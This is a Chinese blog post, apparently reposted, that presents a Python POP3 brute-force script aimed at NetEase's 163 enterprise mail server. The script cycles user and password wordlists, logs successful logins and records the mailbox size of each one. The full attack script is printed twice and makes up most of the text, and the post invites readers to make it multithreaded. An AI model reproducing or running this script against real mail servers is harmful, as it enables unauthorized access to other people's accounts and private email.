企业邮箱爆破小脚本(Python版)
2016-08-05 18:11
771 查看
之前发了一个帖子: http://zone.wooyun.org/content/20379 总结了几种企业邮箱爆破的一些小技巧,直接贴出具体的爆破脚本吧。以163企业邮箱为例,目前这个是单线程的,也是从网上找到的爆破google邮箱的代码简单修改成的,只支持pop3协议。小伙伴们可以修改成支持多种协议、多线程的,坐等。贴上代码:
#!usr/bin/python
#Email Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
#http://www.nxadmin.com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t EmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./qmailpopbrute.py <userlist> <wordlist>\n"
sys.exit(1)
server = "pop.qiye.163.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3(server,110)
welcome = pop.getwelcome()
print welcome
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
def mailbruteforce(listuser,listpwd):
if len(listuser) < 1 or len(listpwd) < 1 :
print "An error occurred: No user or pass list"
return 1
for user in listuser:
for value in listpwd :
user = user.replace("\n","")
value = value.replace("\n","")
try:
print "-"*12
print "[+] User:",user,"Password:",value
time.sleep(2)
pop = poplib.POP3(server,110)
pop.user(user)
auth = pop.pass_(value)
print auth
if auth.split(' ')[0]!= "+OK" :
pop.quit()
print "unknown error !"
continue
if pop.stat()[1] is None or pop.stat()[1] < 1 :
pop.quit()
print "unknown error !"
continue
#print "\t\t\n\nLogin successful:",user, value
#print "\t\tMail:",pop.stat()[0],"emails"
#print "\t\tSize:",pop.stat()[1],"bytes\n\n"
ret = (user,value,pop.stat()[0],pop.stat()[1])
success.append(ret)
#print len(success)
pop.quit()
break
except:
#print "An error occurred:", msg
pass
print "\n\t EmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
mailbruteforce(users,words)
print "\t[+] have weakpass :\t",len(success)
if len(success) >=1:
for ret in success:
print "\n\n[+] Login successful:",ret[0], ret[1]
print "\t[+] Mail:",ret[2],"emails"
print "\t[+] Size:",ret[3],"bytes\n"
print "\n[-] Done"
相关视频;
python编程学习http://edu.aqniu.com/course/139
kali实战密码破解http://edu.aqniu.com/course/345
kali实战无线渗透http://edu.aqniu.com/course/293
Kali Linux渗透测试http://edu.aqniu.com/course/83
#!usr/bin/python
#Email Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
#http://www.nxadmin.com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t EmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./qmailpopbrute.py <userlist> <wordlist>\n"
sys.exit(1)
server = "pop.qiye.163.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3(server,110)
welcome = pop.getwelcome()
print welcome
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
def mailbruteforce(listuser,listpwd):
if len(listuser) < 1 or len(listpwd) < 1 :
print "An error occurred: No user or pass list"
return 1
for user in listuser:
for value in listpwd :
user = user.replace("\n","")
value = value.replace("\n","")
try:
print "-"*12
print "[+] User:",user,"Password:",value
time.sleep(2)
pop = poplib.POP3(server,110)
pop.user(user)
auth = pop.pass_(value)
print auth
if auth.split(' ')[0]!= "+OK" :
pop.quit()
print "unknown error !"
continue
if pop.stat()[1] is None or pop.stat()[1] < 1 :
pop.quit()
print "unknown error !"
continue
#print "\t\t\n\nLogin successful:",user, value
#print "\t\tMail:",pop.stat()[0],"emails"
#print "\t\tSize:",pop.stat()[1],"bytes\n\n"
ret = (user,value,pop.stat()[0],pop.stat()[1])
success.append(ret)
#print len(success)
pop.quit()
break
except:
#print "An error occurred:", msg
pass
print "\n\t EmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
mailbruteforce(users,words)
print "\t[+] have weakpass :\t",len(success)
if len(success) >=1:
for ret in success:
print "\n\n[+] Login successful:",ret[0], ret[1]
print "\t[+] Mail:",ret[2],"emails"
print "\t[+] Size:",ret[3],"bytes\n"
print "\n[-] Done"
相关视频;
python编程学习http://edu.aqniu.com/course/139
kali实战密码破解http://edu.aqniu.com/course/345
kali实战无线渗透http://edu.aqniu.com/course/293
Kali Linux渗透测试http://edu.aqniu.com/course/83
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- python制作企业邮箱的爆破脚本
- Python版Mysql爆破小脚本
- Python FTP爆破脚本
- Python版Mssql爆破小脚本
- CTF writeup:python脚本爆破zip密码
- python脚本网址爆破
- python制作企业邮箱的爆破脚本
- Python绝技笔记--------Zip压缩文件密码爆破小脚本
- Python版Mssql爆破小脚本
- 利用python脚本生成字典爆破
- Python版Mysql爆破小脚本
- WEB中间件--tomcat爆破,burp和python脚本,getshell,war包
- 转载:用Python编写自动下载网络小说的脚本
- 用python脚本对svn库进行备份,压缩,加密,ftp上传
- 用Python编写自动下载网络小说的脚本
- IronPython脚本调用C#实现的dll库
- Python、Lua和Ruby——脚本大P.K.
- 强迫自己养成习惯用 python 写一些小脚本
- 使用Python脚本自动修改Windows的IP、网关和DNS设置
- 脚本语言比较:CSE vs Python